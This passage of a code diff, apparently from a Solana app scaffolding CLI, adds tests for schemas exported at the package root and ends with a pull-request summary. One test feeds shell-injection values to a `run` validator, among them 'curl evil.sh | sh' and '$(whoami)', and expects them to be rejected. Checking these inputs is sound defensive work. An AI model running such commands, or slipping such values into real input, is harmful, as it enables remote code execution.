+      packageManagerExplicit: false,
+      targetDirectory: dir,
+    } as GetArgsResult
+    initScriptPackageManager(args)
+    expect(args.packageManager).toBe('npm')
+    const removed = removeIncompatiblePackageManager(dir, args.packageManager)
+    expect(removed).toBe('yarn@4.0.0')
+  })
+})

--- a/test/root-exports-schemas.test.ts
+++ b/test/root-exports-schemas.test.ts
@@ -1,0 +1,165 @@
+import { describe, expect, expectTypeOf, it } from 'vitest'
+import {
+  initScriptKey,
+  InitScriptSchema,
+  InitScriptSchemaInstructions,
+  InitScriptSchemaOption,
+  InitScriptSchemaOptions,
+  InitScriptSchemaPackageManager,
+  InitScriptSchemaRename,
+  InitScriptSchemaSkills,
+  InitScriptSchemaVersions,
+  parseTemplateJson,
+  templateJsonGroupSchema,
+  templateJsonSchema,
+  templateJsonTemplateSchema,
+} from '../src/index'
+import type {
+  InitScriptInstructions,
+  InitScriptOption,
+  InitScriptOptions,
+  InitScriptPackageManager,
+  InitScriptRename,
+  InitScriptSkills,
+  InitScriptVersions,
+} from '../src/index'
+import * as initScriptSchemaModule from '../src/utils/init-script-schema'
+import * as templateSchemaModule from '../src/utils/template-schema'
+
+const templateGroup = {
+  description: 'Templates for mobile apps',
+  name: 'mobile',
+  path: 'templates/mobile',
+  templates: [
+    {
+      description: 'A React Native app',
+      displayName: 'React Native',
+      id: 'mobile-react-native',
+      keywords: ['mobile', 'react-native'],
+      name: 'react-native',
+      path: 'templates/mobile/react-native',
+    },
+  ],
+}
+
+describe('package root schema exports', () => {
+  it('exports the template catalog schemas', () => {
+    const exportedSchemas = {
+      parseTemplateJson,
+      templateJsonGroupSchema,
+      templateJsonSchema,
+      templateJsonTemplateSchema,
+    }
+
+    expect(Object.keys(exportedSchemas)).toEqual([
+      'parseTemplateJson',
+      'templateJsonGroupSchema',
+      'templateJsonSchema',
+      'templateJsonTemplateSchema',
+    ])
+
+    // The root export must be the same instance the CLI uses, not a copy
+    expect(templateJsonSchema).toBe(templateSchemaModule.templateJsonSchema)
+    expect(templateJsonGroupSchema).toBe(templateSchemaModule.templateJsonGroupSchema)
+    expect(templateJsonTemplateSchema).toBe(templateSchemaModule.templateJsonTemplateSchema)
+    expect(parseTemplateJson).toBe(templateSchemaModule.parseTemplateJson)
+  })
+
+  it('exports the init script schemas', () => {
+    const exportedSchemas = {
+      InitScriptSchema,
+      InitScriptSchemaInstructions,
+      InitScriptSchemaOption,
+      InitScriptSchemaOptions,
+      InitScriptSchemaPackageManager,
+      InitScriptSchemaRename,
+      InitScriptSchemaSkills,
+      InitScriptSchemaVersions,
+    }
+
+    expect(Object.keys(exportedSchemas)).toEqual([
+      'InitScriptSchema',
+      'InitScriptSchemaInstructions',
+      'InitScriptSchemaOption',
+      'InitScriptSchemaOptions',
+      'InitScriptSchemaPackageManager',
+      'InitScriptSchemaRename',
+      'InitScriptSchemaSkills',
+      'InitScriptSchemaVersions',
+    ])
+
+    // The root export must be the same instance the CLI uses, not a copy
+    expect(InitScriptSchema).toBe(initScriptSchemaModule.InitScriptSchema)
+    expect(InitScriptSchemaInstructions).toBe(initScriptSchemaModule.InitScriptSchemaInstructions)
+    expect(InitScriptSchemaOption).toBe(initScriptSchemaModule.InitScriptSchemaOption)
+    expect(InitScriptSchemaOptions).toBe(initScriptSchemaModule.InitScriptSchemaOptions)
+    expect(InitScriptSchemaPackageManager).toBe(initScriptSchemaModule.InitScriptSchemaPackageManager)
+    expect(InitScriptSchemaRename).toBe(initScriptSchemaModule.InitScriptSchemaRename)
+    expect(InitScriptSchemaSkills).toBe(initScriptSchemaModule.InitScriptSchemaSkills)
+    expect(InitScriptSchemaVersions).toBe(initScriptSchemaModule.InitScriptSchemaVersions)
+    expect(initScriptKey).toBe(initScriptSchemaModule.initScriptKey)
+  })
+
+  it('validates a template catalog through the root exports', () => {
+    expect(templateJsonSchema.safeParse([templateGroup]).success).toBe(true)
+    expect(templateJsonGroupSchema.safeParse(templateGroup).success).toBe(true)
+    expect(templateJsonTemplateSchema.safeParse(templateGroup.templates[0]).success).toBe(true)
+
+    const invalid = templateJsonSchema.safeParse([{ ...templateGroup, name: 42 }])
+    expect(invalid.success).toBe(false)
+
+    expect(parseTemplateJson(JSON.stringify([templateGroup])).success).toBe(true)
+    expect(parseTemplateJson('not json').success).toBe(false)
+  })
+
+  it('validates an init script through the root exports', () => {
+    const initScript = {
+      instructions: ['pnpm install'],
+      options: {
+        'mobile-wallet': {
+          default: true,
+          description: 'Include mobile wallet adapter',
+          group: 'mobile',
+          instructions: ['pnpm run android'],
+          rename: { 'wallet-name': { paths: ['app'], to: 'my-wallet' } },
+        },
+      },
+      packageManager: 'pnpm',
+      rename: { 'anchor-project': { paths: ['anchor'], to: 'my-project' } },
+      skills: ['solana-dev'],
+      versions: { anchor: '0.31.1', solana: '2.1.0' },
+    }
+
+    expect(InitScriptSchema.safeParse(initScript).success).toBe(true)
+    expect(InitScriptSchema.safeParse({}).success).toBe(true)
+    expect(InitScriptSchema.safeParse({ packageManager: 'not-a-package-manager' }).success).toBe(false)
+
+    expect(InitScriptSchemaInstructions.safeParse(initScript.instructions).success).toBe(true)
+    expect(InitScriptSchemaOption.safeParse(initScript.options['mobile-wallet']).success).toBe(true)
+    expect(InitScriptSchemaOptions.safeParse(initScript.options).success).toBe(true)
+    // Option keys are constrained to lowercase kebab-case flag names
+    expect(InitScriptSchemaOptions.safeParse({ 'Mobile Wallet': {} }).success).toBe(false)
+    expect(InitScriptSchemaPackageManager.safeParse('npm').success).toBe(true)
+    expect(InitScriptSchemaRename.safeParse(initScript.rename).success).toBe(true)
+    expect(InitScriptSchemaSkills.safeParse(initScript.skills).success).toBe(true)
+    expect(InitScriptSchemaVersions.safeParse(initScript.versions).success).toBe(true)
+
+    expect(initScriptKey).toBe('create-solana-dapp')
+  })
+
+  it('exports the init script types inferred from the schemas', () => {
+    expectTypeOf<InitScriptInstructions>().toEqualTypeOf<string[]>()
+    expectTypeOf<InitScriptSkills>().toEqualTypeOf<string[]>()
+    expectTypeOf<InitScriptPackageManager>().toEqualTypeOf<'bun' | 'npm' | 'pnpm' | 'yarn'>()
+    expectTypeOf<InitScriptRename>().toEqualTypeOf<Record<string, { paths: string[]; to: string }>>()
+    expectTypeOf<InitScriptOption>().toEqualTypeOf<{
+      default?: boolean
+      description?: string
+      group?: string
+      instructions?: string[]
+      rename?: InitScriptRename
+    }>()
+    expectTypeOf<InitScriptOptions>().toEqualTypeOf<Record<string, InitScriptOption>>()
+    expectTypeOf<InitScriptVersions>().toEqualTypeOf<{ adb?: string; anchor?: string; solana?: string }>()
+  })
+})

--- a/test/root-exports-schemas.test.ts
+++ b/test/root-exports-schemas.test.ts
@@ -139,6 +139,13 @@ describe('package root schema exports', () => {
     expect(InitScriptSchemaOptions.safeParse(initScript.options).success).toBe(true)
     // Option keys are constrained to lowercase kebab-case flag names
     expect(InitScriptSchemaOptions.safeParse({ 'Mobile Wallet': {} }).success).toBe(false)
+    // `run` reaches a shell, so shell metacharacters are rejected rather than escaped
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project -- --yes' }).success).toBe(true)
+    expect(InitScriptSchemaOption.safeParse({ run: 'configure --path=./src --tag=v1.2.3' }).success).toBe(true)
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project ; arbitrary-command' }).success).toBe(false)
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project && curl evil.sh | sh' }).success).toBe(false)
+    expect(InitScriptSchemaOption.safeParse({ run: 'reset-project $(whoami)' }).success).toBe(false)
+    expect(InitScriptSchemaOption.safeParse({ run: 'configure --title "My  App"' }).success).toBe(false)
     expect(InitScriptSchemaPackageManager.safeParse('npm').success).toBe(true)
     expect(InitScriptSchemaRename.safeParse(initScript.rename).success).toBe(true)
     expect(InitScriptSchemaSkills.safeParse(initScript.skills).success).toBe(true)
@@ -158,6 +165,7 @@ describe('package root schema exports', () => {
       group?: string
       instructions?: string[]
       rename?: InitScriptRename
+      run?: string
     }>()
     expectTypeOf<InitScriptOptions>().toEqualTypeOf<Record<string, InitScriptOption>>()
     expectTypeOf<InitScriptVersions>().toEqualTypeOf<{ adb?: string; anchor?: string; solana?: string }>()

--- a/test/root-exports-schemas.test.ts
+++ b/test/root-exports-schemas.test.ts
@@ -121,11 +121,11 @@ describe('package root schema exports', () => {
           description: 'Include mobile wallet adapter',
           group: 'mobile',
           instructions: ['pnpm run android'],
-          rename: { 'wallet-name': { paths: ['app'], to: 'my-wallet' } },
+          rename: { 'wallet-name': { in: ['app'], to: 'my-wallet' } },
         },
       },
       packageManager: 'pnpm',
-      rename: { 'anchor-project': { paths: ['anchor'], to: 'my-project' } },
+      rename: { 'anchor-project': { in: ['anchor'], to: 'my-project' } },
       skills: ['solana-dev'],
       versions: { anchor: '0.31.1', solana: '2.1.0' },
     }
@@ -151,7 +151,7 @@ describe('package root schema exports', () => {
     expectTypeOf<InitScriptInstructions>().toEqualTypeOf<string[]>()
     expectTypeOf<InitScriptSkills>().toEqualTypeOf<string[]>()
     expectTypeOf<InitScriptPackageManager>().toEqualTypeOf<'bun' | 'npm' | 'pnpm' | 'yarn'>()
-    expectTypeOf<InitScriptRename>().toEqualTypeOf<Record<string, { paths: string[]; to: string }>>()
+    expectTypeOf<InitScriptRename>().toEqualTypeOf<Record<string, { in?: string[]; paths?: string[]; to: string }>>()
     expectTypeOf<InitScriptOption>().toEqualTypeOf<{
       default?: boolean
       description?: string

--- a/test/search-and-replace.test.ts
+++ b/test/search-and-replace.test.ts
@@ -55,6 +55,14 @@ describe('searchAndReplace', () => {
     await expect(access(join(tempDir, 'oldname.txt'))).rejects.toThrow()
   })
 
+  it('should replace content when the target is an individual file', async () => {
+    const filePath = join(tempDir, 'file1.txt')
+
+    await searchAndReplace(filePath, ['Hello'], ['Hi'])
+
+    expect(await readFile(filePath, 'utf8')).toBe('Hi world')
+  })
+
   it('should treat search values as literal strings', async () => {
     await writeFile(join(tempDir, 'foo.bar.txt'), 'foo.bar fooXbar')
     await writeFile(join(tempDir, 'fooXbar.txt'), 'fooXbar')


### PR DESCRIPTION
## Summary by Sourcery

Add template-defined option flags and scripts to the CLI, improve init-script and package-manager handling, and harden template cloning and installation flows while updating runtime/Dev tooling and exports.

New Features:
- Support template-defined boolean CLI flags with defaults, mutually exclusive groups, file renames, post-create instructions, and optional package.json scripts to run before install.
- Expose template catalog and init-script Zod schemas and inferred types from the package root for external validation and tooling.
- Prefill the interactive project name prompt from the selected template and switch prompt order to choose the template before entering the name.

Bug Fixes:
- Retry template downloads when a cached archive is corrupt and surface an actionable cache-clearing message instead of a low-level zlib error.
- Ensure package installation removes stale lockfiles using Node APIs (without shell commands) and handles disappearing files and unexpected errors correctly.
- Treat template-required package managers as unavailable with clearer error messages and verbose diagnostics, and avoid misinterpreting missing explicit selections in programmatic use.
- Allow search-and-replace to operate on a single file path as well as directories, and refine init-script rename handling so package-name and entry renames interact correctly while preserving punctuation.

Enhancements:
- Snapshot init scripts and template-option selections after cloning so flags are validated early and later package.json rewrites cannot drop required transformations, and clean up the target directory on failures.
- Support `in` as the preferred field for init-script rename entries, deprecate `paths` with warnings, and tighten schema validation for rename entries and option `run` values.
- Add a utility to strip incompatible `packageManager` pins from generated package.json files while preserving matching pins, and document the behavior.
- Improve CLI argument parsing to separate template-defined flags from known Commander options without registering them globally.
- Refine project-name validation with a reusable format check and avoid proposing unusable names from template paths in prompts.

Build:
- Switch the published CLI binary to an ESM entry point, raise the Node.js engines floor to >=22.12.0, and align Docker and contributing docs with the new `index.mjs` bin.
- Update runtime and dev dependencies (including zod v4) and add a pnpm workspace config with a minimum release age.
- Adjust ESLint ignore patterns to match directories at any depth and keep schema imports on the primary `zod` entrypoint.

CI:
- Expand the test matrix to include Node 22.12.0 as the minimum supported version.

Documentation:
- Document template-defined options, their CLI usage, default and grouping behavior, and the new `run` script capability in the README, along with updated examples for rename entries and skills.
- Clarify CONTRIBUTING and Docker usage examples to reference the new ESM CLI entry point.

Tests:
- Add extensive unit tests for template option resolution and scripts, init-script behavior, corrupt template archives, package-manager precedence and cleanup, template option flag extraction, prompt ordering and defaults, and schema validation.
- Add tests to ensure root-level exports for schemas and types remain aligned with their internal definitions and that the package manifest correctly declares runtime dependencies without optional peer conflicts.

Chores:
- Introduce multiple changeset entries documenting new features, deprecations, and behavior changes around template options, package managers, schemas, and platform support.
- Add a package-manifest sanity test to enforce dependency and peer-dependency constraints around required runtime modules like zod.